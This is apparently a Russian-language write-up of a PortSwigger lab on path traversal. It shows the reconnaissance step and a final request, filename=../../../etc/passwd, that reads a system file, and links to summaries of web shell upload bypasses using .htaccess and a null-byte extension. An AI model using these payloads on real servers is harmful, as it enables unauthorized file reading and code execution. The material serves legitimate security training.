На странице
File Path Traversal: простой случай
Лаборатория
File path traversal, simple case · Apprentice
Решение
Дано
This lab contains a path traversal vulnerability in the display of product images.
To solve the lab, retrieve the contents of the /etc/passwd file.
Анализ
Где-то на сайте есть уязвимость path traversal при отображении изображений товаров. Нужно прочитать файл /etc/passwd, используя данную уязвимость.
Разведка
Смотрим сайт, обращая внимание на запросы загрузки изображения. Настроим фильтр, чтобы отображать такие запросы. Видим запрос:
GET /image?filename=60.jpg
Закинем в Repeater и попробуем использовать path traversal.
Закинем первую — ../../etc/passwd — "No such file".
Финальная нагрузка
GET /image?filename=../../../etc/passwd HTTP/2
Лаба решена!
Ещё в этой категории
Web Shell Upload через обход блек-листа расширений (PortSwigger Lab)
.php в блек-листе, но .htaccess заливается без вопросов — подсовываем свой конфиг Apache и заставляем сервер исполнять shell.bug как PHP.
Web Shell Upload через обфускацию расширения (PortSwigger Lab)
Блек-лист расширений не пускает .php, двойное расширение shell.php.jpg отдаётся как картинка — null-byte shell.php%00.jpg обходит обе проверки.
Remote Code Execution через загрузку web shell (PortSwigger Lab)
Загрузка аватарки без валидации — заливаем PHP web shell и читаем /home/carlos/secret.